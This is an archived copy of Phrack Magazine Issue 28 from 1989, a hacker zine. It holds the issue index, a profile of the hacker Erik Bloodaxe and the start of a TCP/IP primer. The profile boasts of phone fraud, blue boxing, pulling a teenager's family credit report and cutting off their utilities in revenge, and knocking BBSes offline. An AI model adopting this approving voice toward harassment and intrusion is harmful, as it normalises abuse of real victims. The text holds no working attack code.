home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 28.sit / Phrack Issue 28
Text File  |  1997-02-22  |  232KB  |  4,907 lines

  1. <head>
  2. <title>Phrack Magazine Issue 28, File 1 of 1 </title>
  3. <head>
  4. <body>
  5. <pre>
  6.  
  7.                                 ==Phrack Inc.==
  8.  
  9.                      Volume Three, Issue 28, File #1 of 12
  10.  
  11.                    Phrack Inc. Newsletter Issue XXVIII Index
  12.                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13.                                 October 7, 1989
  14.  
  15.  
  16.      Greetings and welcome to Issue 28 of Phrack Inc.  We really
  17. must apologize for the lateness of this issue, but sorting
  18. through all of the files sent in from over the entire summer as
  19. well as our own real life responsibilities have been keeping us
  20. both rather busy.
  21.  
  22.      This issue we feature Phrack World News Special Edition III.
  23. This file contains the exclusive coverage of SummerCon '89, which
  24. took place in St. Louis, Missouri on June 22-25, 1989.
  25.  
  26.      The Future Transcendent Saga continues in this issue with
  27. part one of a file about TCP/IP.  We also present to you the
  28. beginning of a new irregular column called Network Miscellany by
  29. Taran King.  Its exactly what it says it is -- interesting and
  30. important changes in, and tips about using, the Internet.  It
  31. will contain different material each issue it is presented in to
  32. keep pace with the always changing wide area networks.  Speaking
  33. of irregular columns, Phrack Pro-Phile returns this issue with a
  34. detailed look at Erik Bloodaxe of LOD.
  35.  
  36.      As always, we ask that anyone with network access drop us a
  37. line to either our Bitnet or Internet addresses...
  38.  
  39.                Taran King                        Knight Lightning
  40.           C488869@UMCVMB.BITNET                C483307@UMCVMB.BITNET
  41.        C488869@UMCVMB.MISSOURI.EDU          C483307@UMCVMB.MISSOURI.EDU
  42.  
  43. And now we can also be reached via our new mail forwarding
  44. addresses (for those that cannot mail to our Bitnet or Internet
  45. addresses):
  46.  
  47.                ...!netsys!phrack      or      phrack@netsys.COM
  48. _______________________________________________________________________________
  49.  
  50. Table of Contents:
  51.  
  52. 1.  Phrack Inc. XXVIII Index by Taran King and Knight Lightning
  53. 2.  Phrack Pro-Phile XXVIII on Erik Bloodaxe by Taran King
  54. 3.  Introduction to the Internet Protocols:  Chapter Eight of the FTS by KL
  55. 4.  Network Miscellany by Taran King
  56. 5.  A Real Functioning PEARL BOX Schematic by Dispater
  57. 6.  Snarfing Remote Files by Dark OverLord
  58. 7.  Other Common Carriers; A List By Equal Axis
  59. 8.  Phrack World News Special Edition III (SummerCon '89) by Knight Lightning
  60. 9-12 Phrack World News XXVIII/Parts 1-4 by Knight Lightning
  61. _______________________________________________________________
  62.  
  63.                                 ==Phrack Inc.==
  64.  
  65.                      Volume Three, Issue 28, File #2 of 12
  66.  
  67.                           ==Phrack Pro-Phile XXVIII==
  68.  
  69.                        Created and Written by Taran King
  70.  
  71.                           Done on September 23, 1989
  72.  
  73.          Welcome to Phrack Pro-Phile XXVIII.  Phrack Pro-Phile
  74. was created to bring information to you, the community, about
  75. retired or highly important/ controversial people.  This issue,
  76. we bring you a long time member of the hacking community and a
  77. charter member of the Legion Of Doom...
  78.  
  79.                                  Erik Bloodaxe
  80.                                  ~~~~~~~~~~~~~
  81.        Handle:  Erik Bloodaxe
  82.      Call Him:  Chris
  83. Handle Origin:  "Vikings" by ? (Don't remember)
  84. Date Of Birth:  20 years ago
  85.   Current Age:  20
  86.        Height:  5' 10"
  87.        Weight:  130
  88.     Eye Color:  Blue
  89.    Hair Color:  Brown
  90.    Blood Type:  A+
  91.   Sperm Count:  3
  92.     Computers:  Atari 400, various dumb terminals, CompuAdd Turbo XT
  93.  
  94. Origins in Phreak/Hack World
  95. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  96. Way back when he was in 7th grade, some 8+ years back, Erik was
  97. quite a shoplifter.  As was the norm for 13 year-olds, he and a
  98. friend of his had stolen a stack of "girlie" magazines on one of
  99. their "raids."  One of these was High Society, which was toying
  100. with the idea of "recorded entertainment."  His friend was
  101. determined to hear this, but as the number was in New York, they
  102. decided to use the "strange phone service" his mother had signed
  103. up for to keep down the bill.  He explained it to Erik, "You dial
  104. this number and then tell the operator your number and the phone
  105. number."  They called it and told the operator a number that was
  106. 100 off by mistake.  The operator said "Thank you," and the call
  107. went through.  Thus was born a "code-abuser."  They kept this
  108. information to themselves for several months.  When the service
  109. changed to an automated format (rather than operator service),
  110. they began to share their knowledge.  Word spread like wildfire.
  111. Interestingly enough, to this day, he can still backtrack 95% of
  112. all hacker-related code abuse from San Antonio back to himself as
  113. the originator of the information (well, a friend of a friend of
  114. a friend, etc..)
  115.  
  116. Origins in Phreak/Hack BBSes
  117. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  118. A friend of Bloodaxe's father bought a MicroModem II to get
  119. information from Dialog for his legal practice.  He still
  120. remembers the first time he used it.  His friend's dad used
  121. Dialog through Telenet.  Once he saw Telenet, he began trying
  122. various addresses.  One of the first things he ever did was get
  123. into a 212 VAX/VMS with GUEST/GUEST.  Erik had absolutely no idea
  124. what he was doing.  They were just guessing... typing things like
  125. "hello?", "catalog", and assorted other inane things.  They also
  126. called a few BBSes that came with the modem instructions (using
  127. their long-distance trick).  By the end of the weekend, they had
  128. worked their way to Pirates' Harbor (now TIMECOR) in 617, and
  129. Pirates' Cove 516.  From then on, he was hooked on modems.  Then,
  130. Wargames came out.  Embarrassing as it is for Erik, Wargames
  131. really did play a part in imbedding the idea of computer
  132. "hacking" in his little head.  (As it did for hundreds of others
  133. who are too insecure to admit it.)  He had his little Atari 400,
  134. but no modem (Hayes 300's were still hundreds of dollars).
  135. Another friend got an Atari Acoustic Coupler for his 800.  Born
  136. now were the Atari Warez D00dz.  For about a year, they did
  137. nothing but call Atari BBSes (and anything that had "Pirate" in
  138. its name).  They did stumble onto things like the Phone Booth in
  139. 303, OSUNY (on an OHIO Scientific, days before it went down), and
  140. Mines of Moria (713).  Finally, he got an MPP modem.  Bloodaxe
  141. was on it day and night.  By this time they got into scanning.
  142. He was the one who checked everything out, as he was the one who
  143. was reading up on computer OSes at the UTSA library.  They were
  144. still big into games, and they ran across a really new game
  145. called Behind Jaggi Lines.  A guy named Devious Xevious traded
  146. them something called Software Blue Box for it, and gave them a
  147. BBS to call:  Pirate-80.  In 1983, Erik Bloodaxe entered the
  148. hack/phreak world.  He was blue boxing most of his calls by then.
  149.  
  150.  
  151. People in the Phreak/Hack World Met
  152. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  153. Bloodaxe has only met a handful "face-to-face," but has spoken
  154. with almost everyone around in the "golden-years," as he was
  155. heavily into conferences.
  156.  
  157.  
  158. Experience Gained In the Following Ways
  159. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  160. Mainly trial and error.  He would find a system, try to get in
  161. with simplistic username/password pairs, and then read help.  He
  162. also reads a lot.  He didn't speak out until he was sure of what
  163. he was talking about.  Erik never asked any questions, but always
  164. listened.  During the time he was a true "novice," he kept it
  165. fairly hidden, because he didn't want to seem stupid.
  166.  
  167. Chris attributes the knowledge he has gained to himself.
  168.  
  169.  
  170. Memorable Phreak/Hack BBSes
  171. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  172. Pirate-80  (He still call to check in on Scott)
  173. Sherwood Forest I, II, III
  174. RACS III (Tuc wouldn't let him on until years after he first called!!)
  175. Plovernet (Before and after the move)
  176. COPS (Where he got mail from Lex telling him to call Legion of Doom)
  177. WOPR (Getting closer to what BBSes would become)
  178. Hacknet (217)
  179. Legion of Doom (The ultimate in BBSes at the time)
  180. Crystal Palace (OSUNY lives again!)
  181. Newsnet (Yes, Sir Knight's BBS)
  182. Blottoland (Lair of the rodents)
  183. Ripco (A looooooong time ago, certainly not now)
  184. The Broadway Show ("Well, Mike was a little off, but so what.")
  185. Farmers of Doom! (Run from a pay phone, complete chaos)
  186. The Connection (A good private BBS)
  187. Catch-22 (A "better" private BBS)
  188. The Pipeline (718)
  189. Freeworld II
  190. Executive Inn (Re-instilled his faith in BBSes)
  191. The Phoenix Project (What he would want his BBS to equal or
  192. surpass in quality)
  193. Black Ice (A big leak; ask anyone at the Ameritech security
  194. convention)
  195. Pure Nihilism (Too much fun!)
  196.  
  197.  
  198. Schooling/Work
  199. ~~~~~~~~~~~~~~
  200. Chris is currently struggling as a Computer Science major at
  201. University of Texas in Austin with intentions of a PhD,
  202. specializing in AI research.
  203.  
  204.  
  205. Accomplishments
  206. ~~~~~~~~~~~~~~~
  207. Project Educate:  Was supposed to replace TAP after Tuc got fed
  208.                   up.  No one really knows what happened to it.
  209.  
  210. LOD/H TJ:         Assorted work, major distributor.
  211.  
  212. Numerous files.
  213.  
  214.  
  215. Phreak/Hack Groups
  216. ~~~~~~~~~~~~~~~~~~
  217. LOD - In the original recruitment group, still in, still active.
  218.       What more can be said?  "LOD!" basically sums it all up.
  219.  
  220. Camorra - Erik still gets mad about this.  He was asked by the
  221.           602 Scorpion to join a group that was being formed.  He
  222.           agreed, and he then came up with Camorra as a name.
  223.           The other members were Ax Murderer and 301 Executioner.
  224.           He got Dr. Who, Silver Sabre, and Pit Fiend to join and
  225.           Karl Marx, Tuc, and Videosmith were kind of
  226.           in/out-not-really-into-groups-but-we'll-hang-out kind
  227.           of members.  Most of them were deep into their
  228.           phones/computers.  They were planning a series of
  229.           files, such as the first Tymnet directory, a great
  230.           COSMOS file, a database of scans, etc.  Suddenly people
  231.           began appearing in the group that no one voted on.  The
  232.           group kind of split up into two factions, "us and
  233.           them."  Bloodaxe and Dr. Who just got mad and blew it
  234.           all off.  Pit Fiend got busted, and the Scorpion
  235.           disappeared.
  236.  
  237.  
  238. Interests
  239. ~~~~~~~~~
  240. Packet networks (all), telco computers, Unixes, scanning (every night for
  241. almost 5 years!)
  242.  
  243.  
  244. Favorite Things
  245. ~~~~~~~~~~~~~~~
  246. Beer--Tsing Tao, Michelob Dry, Coors Light.  (He am in college, you know!)
  247. Ecstasy--Grinding away (His teeth and his mind).
  248. Getting into a system on the first try.
  249. Unprotected crontab files.
  250. Scanning.  Anything, for anything, just doing it!
  251. A certain shapely 5'2" blonde who shall remain nameless.
  252.  
  253.  
  254. Most Memorable Experiences
  255. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  256. Alliance Teleconferencing way back when.  Tandem scanning out
  257. other sites in Houston and Dallas.  Transferring control to
  258. directory assistance ACD loops, and leaving it there until he
  259. wanted to run one.  Waking up the next morning and yelling into
  260. the phone at everyone else who had stayed on the conference and
  261. starting to talk again.  Conferences that lasted a week.
  262. Catching Draper in lies.  Busying out all the 408 DA's.  Boxing
  263. on a conference and trunking Karl Marx.  Calling random numbers
  264. in California and adding them in if they sounded like teenage
  265. girls.  "Giving" people unlimited trial usage of a "new" long
  266. distance service (LOD Telecommunications).  Jennifer, the
  267. Alliance operator who had it out for him ("This is that
  268. Bloody-axe person isn't it?").
  269.  
  270. The Wharton School of Business Dec-10.  For nearly a month all
  271. the nation's top phreaks and hackers hung out on this system and
  272. used the chat program.  It was "the" place to be (kind of like an
  273. Altger Altos of the past, but no idiots).  Finally they killed
  274. the account, not because of abuse, but because they were loading
  275. the system down.  The students and operators were really cool
  276. about the whole thing.
  277.  
  278. Finding (and spreading around everywhere) the White House Signal
  279. number.  A number of my friends kept calling it, posing as the
  280. mayor of San Antonio, Henry Cisneros, eventually causing the
  281. Secret Service call our high school, and telling the
  282. administrators to grab the people using the payphone to find out
  283. what the hell they were trying to do.
  284.  
  285. Taking down almost every BBS in Alaska when he was denied access
  286. to one.  He pulled the poor kid's parents credit report, sent a
  287. copy to the kid over his modem, and disconnected the kid's phone,
  288. electricity, and water.  He then went around taking down the
  289. BBSes where the kid had friends (guilt by association).  Word got
  290. around the nation kind of fast.  Erik got on most BBSes without
  291. much trouble after all that.  He had a project to be on at least
  292. one BBS in every area code.  Bloodaxe had to get on
  293. non-hack/pirate ones in a few areas, but he managed to do it.  He
  294. stayed active on all of them for several months.  At one time, he
  295. was on about 140 BBSes!!!
  296.  
  297. Reading a new edition of Newsweek with a story by Richard Sandza
  298. in it over a very crowded conference, then suggesting that he
  299. should get some Slim Whitman albums and Civil War Chess Sets via
  300. his Visa.  Erik pulled his history, to scare him, but lost it.
  301. When he pulled it later, there were nearly 100 inquiries, most by
  302. a certain Massachusetts Bank.  At least they gave him a good
  303. source for a follow-up article.
  304.  
  305. Finding out that a certain long distance service (reselling AT&T
  306. WATS) would reset to a WATS dialtone when 2600 was blasted and
  307. then setting up a program to call MTV's 900 number repeatedly to
  308. ensure that Duran Duran would get severely beaten.
  309.  
  310. Bloodaxe remembers boxing up a conference while waiting for the
  311. police to come, and fighting the impulse to run away.  He had
  312. tickets carded to Philadelphia International on a flight that
  313. afternoon (on the conference), and Telenet Bob was ready to meet
  314. Erik's flight, Mark Tabas was ready to send him a blank birth
  315. certificate, not to mention offers to stay with Dr. Who or
  316. Telenet Bob for as long as he needed to get settled.  Karl Marx
  317. talked him out of it though.  He was packed and ready to leave
  318. and become a new person in a new city.  Looking back, he's DAMN
  319. glad he didn't do it!
  320.  
  321. Bloodaxe and Who-Bob deciding one fateful day to see if they
  322. could talk to each other's port on Telenet using an ID they had
  323. used for the LOD Telenet directory.
  324.  
  325.  
  326. Some People to Mention
  327. ~~~~~~~~~~~~~~~~~~~~~~
  328. Dr. Who -- "My closest hacker counterpart.  We joke about being
  329.            60 with grandchildren, still having never met, calling
  330.            each other daily, with stories about how we just
  331.            defeated some ISDN service."
  332.  
  333. The Mentor -- "My favorite drinking buddy.  The first hacker I
  334.               ever met face-to-face."
  335.  
  336. Control C -- "One person who can almost equal me in outrageous
  337.               behavior.  Yes, Dan, I said almost!  Nyahh Nyahh!"
  338.  
  339.  
  340. Inside Jokes
  341. ~~~~~~~~~~~~
  342. Lame, Lame, Lame
  343.  
  344. LEGION OF DOOM IN DALLAS...FEDS BAFFLED
  345.  
  346.  
  347. Serious Section
  348. ~~~~~~~~~~~~~~~
  349. Chris makes it a point to make huge filibusters on boards where
  350. he sees anything having even anything remotely related to
  351. carding.  Credit card fraud truly gives hacking a bad name.
  352. Snooping around a VAX is just electronic voyeurism... carding a
  353. new modem is just flat out blue-collar crime.  It's just as bad
  354. as breaking into a house or kicking a puppy!  He does everything
  355. he can (even up to turning off a number) to get credit
  356. information taken off a BBS.  He also tries to remove codes from
  357. BBSes.  He doesn't see code abuse in the same light as credit
  358. card fraud, (although the law does), but posted codes are the
  359. quickest way to get your board busted, and your computer
  360. confiscated.  People should just find a local outdial to wherever
  361. they want to call and use that.  If you only make local calls
  362. from an outdial, it will never die, you will keep out of trouble,
  363. and everyone will be happy.
  364.  
  365. Marijuana, cocaine, LSD, MDMA (& analogs), and methamphetamine
  366. should be legalized and sold in a controlled fashion, regulated
  367. by the government.  Money spent currently on combatting drug
  368. traffic should be spent on the deficit, and on drug education and
  369. rehabilitation.  Making petty vices illegal only breeds crime;
  370. look at prohibition, look at gambling, look at how fast people go
  371. on the highway.  You cannot fight a losing battle, and therefore,
  372. must take on a new strategy.  Alcohol is the only drug he has
  373. ever imbibed and lost all consciousness and complete control of
  374. his actions.  He thinks it is THE most dangerous drug around, and
  375. anyone can get as much of it as they want with very little
  376. effort.  It is legal, but not everyone drinks.  If marijuana was
  377. legal not everyone would smoke it.  He wouldn't for one; he hates
  378. it.  However, farmers would no longer lose their farms; and most
  379. importantly, the economy would be boosted greatly.  Things have
  380. got to change.
  381.  
  382.  
  383. Are Phreaks/Hackers You've Met Generally Computer Geeks?
  384. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  385. Of course not.  There are some that are, but generally there is
  386. an average sampling of the general population.  Hacking is just
  387. another hobby.  Most people who collect comic books are not all
  388. the same, most people who play backgammon are not similar in
  389. physical characteristics either.  The closest stereotype he could
  390. ever even say existed was 6 or so years ago, and that would be
  391. that most hackers then were Jewish and from New York state.  An
  392. obnoxious Texan WASP like Chris really stood out.
  393.  
  394.  
  395. Thanks for your time, Chris.
  396.  
  397.                                                    Taran King
  398. ________________________________________________________________
  399.  
  400.                                 ==Phrack Inc.==
  401.  
  402.                      Volume Three, Issue 28, File #3 of 12
  403.  
  404.        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  405.        <>                                                            <>
  406.        <>           Introduction to the Internet Protocols           <>
  407.        <>           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~           <>
  408.        <>        Chapter Eight Of The Future Transcendent Saga       <>
  409.        <>                                                            <>
  410.        <>                    Part One of Two Files                   <>
  411.        <>                                                            <>
  412.        <>                Presented by Knight Lightning               <>
  413.        <>                        July 3, 1989                        <>
  414.        <>                                                            <>
  415.        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  416.  
  417.  
  418. Prologue
  419. ~~~~~~~~
  420. Much of the material in this file comes from "Introduction to the
  421. Internet Protocols" by Charles L. Hedrick of Rutgers University.
  422. That material is copyrighted and is used in this file by
  423. permission.  Time differention and changes in the wide area
  424. networks have made it necessary for some details of the file to
  425. updated and in some cases reworded for better understanding of
  426. our readers.  Also, Unix is a trademark of AT&T Technologies,
  427. Inc. -- Just thought I'd let you know.
  428.  
  429. If you are not already familiar with TCP/IP, I would suggest that
  430. you read "Introduction to MIDNET" (Phrack Inc., Volume Three,
  431. Issue 27, File 3 of 12) for more information.  That file is
  432. Chapter Seven of The Future Transcendent Saga and contains
  433. information about TCP/IP and how it is used within the National
  434. Science Foundation Network (NSFnet).
  435.  
  436.  
  437. Table of Contents - Part One
  438. ~~~~~~~~~~~~~~~~~
  439. *  Introduction
  440. *  What Is TCP/IP?
  441. *  General Description Of The TCP/IP Protocols
  442.        The TCP Level
  443.        The IP Level
  444.        The Ethernet Level
  445.  
  446.  
  447. Introduction
  448. ~~~~~~~~~~~~
  449. This article is a brief introduction to TCP/IP, followed by
  450. suggestions on what to read for more information.  This is not
  451. intended to be a complete description, but it can give you a
  452. reasonable idea of the capabilities of the protocols.  However,
  453. if you need to know any details of the technology, you will want
  454. to read the standards yourself.
  455.  
  456. Throughout the article, you will find references to the
  457. standards, in the form of "RFC" (Request For Comments) or "IEN"
  458. (Internet Engineering Notes) numbers -- these are document
  459. numbers.  The final section (in Part Two) explains how you can
  460. get copies of those standards.
  461.  
  462.  
  463. What Is TCP/IP?
  464. ~~~~~~~~~~~~~~~
  465. TCP/IP is a set of protocols developed to allow cooperating
  466. computers to share resources across a network.  It was developed
  467. by a community of researchers centered around the ARPAnet.
  468.  
  469. First some basic definitions; The most accurate name for the set
  470. of protocols I am describing is the "Internet protocol suite."
  471. TCP and IP are two of the protocols in this suite (they will be
  472. described below).  Because TCP and IP are the best known of the
  473. protocols, it has become common to use the term TCP/IP to refer
  474. to the whole family.
  475.  
  476. The Internet is a collection of networks, including the Arpanet,
  477. NSFnet, regional networks such as MIDnet (described in Chapter
  478. Seven of the Future Transcendent Saga), local networks at a
  479. number of University and research institutions, and a number of
  480. military networks.  The term "Internet" applies to this entire
  481. set of networks.
  482.  
  483. The subset of them that is managed by the Department of Defense
  484. is referred to as the "DDN" (Defense Data Network).  This
  485. includes some research-oriented networks, such as the ARPAnet, as
  486. well as more strictly military ones (because much of the funding
  487. for Internet protocol developments is done via the DDN
  488. organization, the terms Internet and DDN can sometimes seem
  489. equivalent).
  490.  
  491. All of these networks are connected to each other.  Users can
  492. send messages from any of them to any other, except where there
  493. are security or other policy restrictions on access.  Officially
  494. speaking, the Internet protocol documents are simply standards
  495. adopted by the Internet community for its own use.  The
  496. Department of Defense once issued a MILSPEC definition of TCP/IP
  497. that was intended to be a more formal definition, appropriate for
  498. use in purchasing specifications.  However most of the TCP/IP
  499. community continues to use the Internet standards.  The MILSPEC
  500. version is intended to be consistent with it.
  501.  
  502. Whatever it is called, TCP/IP is a family of protocols.  A few
  503. provide "low-level" functions needed for many applications.
  504. These include IP, TCP, and UDP (all of which will be described in
  505. a bit more detail later in this file).  Others are protocols for
  506. doing specific tasks, e.g. transferring files between computers,
  507. sending mail, or finding out who is logged in on another
  508. computer.
  509.  
  510. Initially TCP/IP was used mostly between minicomputers or
  511. mainframes.  These machines had their own disks, and generally
  512. were self-contained.  Thus the most important "traditional"
  513. TCP/IP services are:
  514.  
  515.     - File Transfer -- The file transfer protocol (FTP) allows a
  516.       user on any computer to get files from another computer, or
  517.       to send files to another computer.  Security is handled by
  518.       requiring the user to specify a user name and password for
  519.       the other computer.
  520.  
  521.       Provisions are made for handling file transfer between
  522.       machines with different character set, end of line
  523.       conventions, etc.  This is not quite the same as "network
  524.       file system" or "netbios" protocols, which will be
  525.       described later.  Instead, FTP is a utility that you run
  526.       any time you want to access a file on another system.  You
  527.       use it to copy the file to your own system.  You then can
  528.       work with the local copy.  (See RFC 959 for specifications
  529.       for FTP.)
  530.  
  531.     - Remote Login -- The network terminal protocol (TELNET)
  532.       allows a user to log in on any other computer on the
  533.       network.  You start a remote session by specifying a
  534.       computer to connect to.  From that time until you finish
  535.       the session, anything you type is sent to the other
  536.       computer.  Note that you are really still talking to your
  537.       own computer, but the telnet program effectively makes your
  538.       computer invisible while it is running.  Every character
  539.       you type is sent directly to the other system.  Generally,
  540.       the connection to the remote computer behaves much like a
  541.       dialup connection.  That is, the remote system will ask you
  542.       to log in and give a password, in whatever manner it would
  543.       normally ask a user who had just dialed it up.
  544.  
  545.       When you log off of the other computer, the telnet program
  546.       exits, and you will find yourself talking to your own
  547.       computer.  Microcomputer implementations of telnet
  548.       generally include a terminal emulator for some common type
  549.       of terminal.  (See RFCs 854 and 855 for specifications for
  550.       telnet.  By the way, the telnet protocol should not be
  551.       confused with Telenet, a vendor of commercial network
  552.       services.)
  553.  
  554.     - Computer Mail -- This allows you to send messages to users
  555.       on other computers.  Originally, people tended to use only
  556.       one or two specific computers and they would maintain "mail
  557.       files" on those machines.  The computer mail system is
  558.       simply a way for you to add a message to another user's
  559.       mail file.  There are some problems with this in an
  560.       environment where microcomputers are used.
  561.  
  562.       The most serious is that a micro is not well suited to
  563.       receive computer mail.  When you send mail, the mail
  564.       software expects to be able to open a connection to the
  565.       addressee's computer, in order to send the mail.  If this
  566.       is a microcomputer, it may be turned off, or it may be
  567.       running an application other than the mail system.  For
  568.       this reason, mail is normally handled by a larger system,
  569.       where it is practical to have a mail server running all the
  570.       time.  Microcomputer mail software then becomes a user
  571.       interface that retrieves mail from the mail server.  (See
  572.       RFC 821 and 822 for specifications for computer mail.  See
  573.       RFC 937 for a protocol designed for microcomputers to use
  574.       in reading mail from a mail server.)
  575.  
  576. These services should be present in any implementation of TCP/IP,
  577. except that micro-oriented implementations may not support
  578. computer mail.  These traditional applications still play a very
  579. important role in TCP/IP-based networks.  However more recently,
  580. the way in which networks are used has been changing.  The older
  581. model of a number of large, self-sufficient computers is
  582. beginning to change.  Now many installations have several kinds
  583. of computers, including microcomputers, workstations,
  584. minicomputers, and mainframes.  These computers are likely to be
  585. configured to perform specialized tasks.  Although people are
  586. still likely to work with one specific computer, that computer
  587. will call on other systems on the net for specialized services.
  588. This has led to the "server/client" model of network services.  A
  589. server is a system that provides a specific service for the rest
  590. of the network.  A client is another system that uses that
  591. service.  Note that the server and client need not be on
  592. different computers.  They could be different programs running on
  593. the same computer.  Here are the kinds of servers typically
  594. present in a modern computer setup.  Also note that these
  595. computer services can all be provided within the framework of
  596. TCP/IP.
  597.  
  598. -  Network file systems.  This allows a system to access files on
  599.    another computer in a somewhat more closely integrated fashion
  600.    than FTP.  A network file system provides the illusion that
  601.    disks or other devices from one system are directly connected
  602.    to other systems.  There is no need to use a special network
  603.    utility to access a file on another system.  Your computer
  604.    simply thinks it has some extra disk drives.  These extra
  605.    "virtual" drives refer to the other system's disks.  This
  606.    capability is useful for several different purposes.  It lets
  607.    you put large disks on a few computers, but still give others
  608.    access to the disk space.  Aside from the obvious economic
  609.    benefits, this allows people working on several computers to
  610.    share common files.  It makes system maintenance and backup
  611.    easier, because you don't have to worry about updating and
  612.    backing up copies on lots of different machines.  A number of
  613.    vendors now offer high-performance diskless computers.  These
  614.    computers have no disk drives at all.  They are entirely
  615.    dependent upon disks attached to common "file servers".  (See
  616.    RFC's 1001 and 1002 for a description of PC-oriented NetBIOS
  617.    over TCP.  In the workstation and minicomputer area, Sun's
  618.    Network File System is more likely to be used.  Protocol
  619.    specifications for it are available from Sun Microsystems.) -
  620.    remote printing.  This allows you to access printers on other
  621.    computers as if they were directly attached to yours.  (The
  622.    most commonly used protocol is the remote lineprinter protocol
  623.    from Berkeley Unix.  Unfortunately, there is no protocol
  624.    document for this.  However the C code is easily obtained from
  625.    Berkeley, so implementations are common.)
  626.  
  627. -  Remote execution.  This allows you to request that a
  628.    particular program be run on a different computer.  This is
  629.    useful when you can do most of your work on a small computer,
  630.    but a few tasks require the resources of a larger system.
  631.    There are a number of different kinds of remote execution.
  632.    Some operate on a command by command basis.  That is, you
  633.    request that a specific command or set of commands should run
  634.    on some specific computer.  (More sophisticated versions will
  635.    choose a system that happens to be free.) However there are
  636.    also "remote procedure call" systems that allow a program to
  637.    call a subroutine that will run on another computer.  (There
  638.    are many protocols of this sort.  Berkeley Unix contains two
  639.    servers to execute commands remotely:  rsh and rexec.  The
  640.    Unix "man" pages describe the protocols that they use.  The
  641.    user-contributed software with Berkeley 4.3 contains a
  642.    "distributed shell" that will distribute tasks among a set of
  643.    systems, depending upon load.
  644.  
  645. -  Name servers.  In large installations, there are a number of
  646.    different collections of names that have to be managed.  This
  647.    includes users and their passwords, names and network
  648.    addresses for computers, and accounts.  It becomes very
  649.    tedious to keep this data up to date on all of the computers.
  650.    Thus the databases are kept on a small number of systems.
  651.    Other systems access the data over the network.  (RFC 822 and
  652.    823 describe the name server protocol used to keep track of
  653.    host names and Internet addresses on the Internet.  This is
  654.    now a required part of any TCP/IP implementation.  IEN 116
  655.    describes an older name server protocol that is used by a few
  656.    terminal servers and other products to look up host names.
  657.    Sun's Yellow Pages system is designed as a general mechanism
  658.    to handle user names, file sharing groups, and other databases
  659.    commonly used by Unix systems.  It is widely available
  660.    commercially.  Its protocol definition is available from Sun.)
  661.  
  662. -  Terminal servers.  Many installations no longer connect
  663.    terminals directly to computers.  Instead they connect them to
  664.    terminal servers.  A terminal server is simply a small
  665.    computer that only knows how to run telnet (or some other
  666.    protocol to do remote login).  If your terminal is connected
  667.    to one of these, you simply type the name of a computer, and
  668.    you are connected to it.  Generally it is possible to have
  669.    active connections to more than one computer at the same time.
  670.    The terminal server will have provisions to switch between
  671.    connections rapidly, and to notify you when output is waiting
  672.    for another connection.  (Terminal servers use the telnet
  673.    protocol, already mentioned.  However any real terminal server
  674.    will also have to support name service and a number of other
  675.    protocols.)
  676.  
  677. -  Network-oriented window systems.  Until recently,
  678.    high-performance graphics programs had to execute on a
  679.    computer that had a bit-mapped graphics screen directly
  680.    attached to it.  Network window systems allow a program to use
  681.    a display on a different computer.  Full-scale network window
  682.    systems provide an interface that lets you distribute jobs to
  683.    the systems that are best suited to handle them, but still
  684.    give you a single graphically-based user interface.  (The most
  685.    widely-implemented window system is X.  A protocol description
  686.    is available from MIT's Project Athena.  A reference
  687.    implementation is publically available from MIT.  A number of
  688.    vendors are also supporting NeWS, a window system defined by
  689.    Sun.  Both of these systems are designed to use TCP/IP.)
  690.  
  691. Note that some of the protocols described above were designed by
  692. Berkeley, Sun, or other organizations.  Thus they are not
  693. officially part of the Internet protocol suite.  However they are
  694. implemented using TCP/IP, just as normal TCP/IP application
  695. protocols are.  Since the protocol definitions are not considered
  696. proprietary, and since commercially-supported implementations are
  697. widely available, it is reasonable to think of these protocols as
  698. being effectively part of the Internet suite.
  699.  
  700. Note that the list above is simply a sample of the sort of
  701. services available through TCP/IP.  However it does contain the
  702. majority of the "major" applications.  The other commonly-used
  703. protocols tend to be specialized facilities for getting
  704. information of various kinds, such as who is logged in, the time
  705. of day, etc.  However if you need a facility that is not listed
  706. here, I encourage you to look through the current edition of
  707. Internet Protocols (currently RFC 1011), which lists all of the
  708. available protocols, and also to look at some of the major TCP/IP
  709. implementations to see what various vendors have added.
  710.  
  711.  
  712. General Description Of The TCP/IP Protocols
  713. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  714. TCP/IP is a layered set of protocols.  In order to understand
  715. what this means, it is useful to look at an example.  A typical
  716. situation is sending mail.  First, there is a protocol for mail.
  717. This defines a set of commands which one machine sends to
  718. another, e.g. commands to specify who the sender of the message
  719. is, who it is being sent to, and then the text of the message.
  720. However this protocol assumes that there is a way to communicate
  721. reliably between the two computers.  Mail, like other application
  722. protocols, simply defines a set of commands and messages to be
  723. sent.  It is designed to be used together with TCP and IP.
  724.  
  725. TCP is responsible for making sure that the commands get through
  726. to the other end.  It keeps track of what is sent, and
  727. retransmitts anything that did not get through.  If any message
  728. is too large for one datagram, e.g. the text of the mail, TCP
  729. will split it up into several datagrams, and make sure that they
  730. all arrive correctly.  Since these functions are needed for many
  731. applications, they are put together into a separate protocol,
  732. rather than being part of the specifications for sending mail.
  733. You can think of TCP as forming a library of routines that
  734. applications can use when they need reliable network
  735. communications with another computer.
  736.  
  737. Similarly, TCP calls on the services of IP.  Although the
  738. services that TCP supplies are needed by many applications, there
  739. are still some kinds of applications that don't need them.
  740. However there are some services that every application needs.  So
  741. these services are put together into IP.  As with TCP, you can
  742. think of IP as a library of routines that TCP calls on, but which
  743. is also available to applications that don't use TCP.  This
  744. strategy of building several levels of protocol is called
  745. "layering."  I like to think of the applications programs such as
  746. mail, TCP, and IP, as being separate "layers," each of which
  747. calls on the services of the layer below it.  Generally, TCP/IP
  748. applications use 4 layers:
  749.  
  750. - An application protocol such as mail.
  751.  
